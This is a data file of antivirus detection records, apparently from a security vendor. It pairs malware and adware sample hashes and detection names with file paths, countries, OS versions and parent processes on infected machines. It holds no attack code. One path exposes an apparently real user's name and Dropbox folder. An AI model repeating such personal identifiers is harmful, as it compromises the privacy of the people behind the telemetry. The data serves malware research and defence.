  Row(detection=Row(filename='adobe-acrobat-reader-dc-.exe', filepath='G:\\مجلد جديد \u202b\u202c\\مجلد جديد \u202b\u202c\\adobe-acrobat-reader-dc-.exe', filesize=928000, name='PUA/InstallCore.Gen7.#M300.#R603246'), hash='6976626276c05d700d044506aca86ff3c3bd27fe009e89ebd2c866e9a34784cf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2088160, timestamp='2018-11-02T16:31:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flash_tool.exe', filepath='D:\\archos\\Archos_50B_Platinum_MT6582_4.4.2_SLFQPLUS10B-S10A_ARCHOS_L43EN_205_140825162345\\SP Flash Tool v5.1644\\flash_tool.exe', filesize=8512000, name='W32/Ramnit.C.#M1.#R1'), hash='14f23866f8929d873f12b621882cac5174a90dacb7ada30e330722247877a6f8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T18:13:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='utilman.exe', filepath='E:\\WINDOWS\\ServicePackFiles\\i386\\utilman.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='4902ac343fff8549e4d76c4c80cc017e021345e753ebf341a575dcfbf398ed57', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T01:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124847-c5b2aef9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_823eb073\\AVSCAN-20181102-124752-BFF2FB5A\\AVSCAN-20181102-124847-C5B2AEF9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T12:34:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155740-de1cec83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155740-DE1CEC83', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='50c634c374bf5.ocx', filepath='\\\\?\\C:\\ProgramData\\wxDownload\\50c634c374bf5.ocx', filesize=128000, name='ADWARE/Adware.Gen.#M300.#R4876'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0128506.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0128506.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='454eed6fc18324b5a6e5255b1ec309993557dc0d7c13e0893d716f5cacbc0e95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T10:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='troop.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\TROOP\\TROOP.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vietnam.exe', filepath='D:\\الالعاب1\\حرب فيتنام\\Conflict.Vietnam.EgYuP.CoM.BY.P@WERNMAN\\Vietnam.exe', filesize=5632000, name='W32/Virut.Gen.#M1.#R1'), hash='2127e1194bf4e737e9f838b863a0274a880c98794295b01b8d45ae967a8c73b6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203509-6e199637', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5580245e\\AVSCAN-20181102-203459-6C06C1A9\\AVSCAN-20181102-203509-6E199637', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113507-e7f7f10a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b3776509\\AVSCAN-20181102-113455-E5A17C9C\\AVSCAN-20181102-113507-E7F7F10A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-025207-1d8efcb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-025207-1D8EFCB1', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='429429469fa40c406470e96c0ad70e669627748c50d4b44ec0be33fb0f961690', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184357-f633fea8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184357-F633FEA8', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054624-9ad228a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054624-9AD228A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125502-de1273ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125502-DE1273CE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:58:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075fb', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075fb', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:51:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051557-597555c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051557-597555C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e6c', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e6c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:45:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline='{63F67F11-7721-4A41-BB80-35C9A344AB90} S-1-5-18:NT AUTHORITY\\\\\\\\System:Service:', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T15:23:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144145-83f0dd4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144145-83F0DD4F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T21:10:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061449-92aa0e8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061449-92AA0E8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX92.832\\Vape\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='\\\\\\/MONITOR', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-02T16:24:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6e25682360f1f77cb50019762a80676835dc64b95c7e676665243a773bdedc56', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6E25682360F1F77CB50019762A80676835DC64B95C7E676665243A773BDEDC56', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6e25682360f1f77cb50019762a80676835dc64b95c7e676665243a773bdedc56', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132138-06b2beab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132138-06B2BEAB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:24:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120244-4666093a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43346497\\AVSCAN-20181102-120225-43BE267B\\AVSCAN-20181102-120244-4666093A', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052242-4adf201e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052242-4ADF201E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meatholes.com_12.05.11.val.xxx.imageset-yapg.rar', filepath='G:\\MeatHoles.com_12.05.11.Val.XXX.iMAGESET-YAPG-11\\.tmp\\MeatHoles.com_12.05.11.Val.XXX.iMAGESET-YAPG.rar', filesize=1920000, name='TR/Spy.Zbot.aim.#M1.#R1'), hash='507ac27c0d0cef0c721af9cc23a075e1cbaceacde8cb9c17bd84c6747f9ff4b0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T00:02:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130648-6151dd87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130648-6151DD87', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:09:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121654-34fe648a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-121654-34FE648A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061358-744b75b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061358-744B75B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115028-fff5b0b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c18dd663\\AVSCAN-20181102-115013-FD5507A5\\AVSCAN-20181102-115028-FFF5B0B2', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:50:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T095601-00634/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:16:04Z'), dt=datetime.date(2018, 11, 2)),
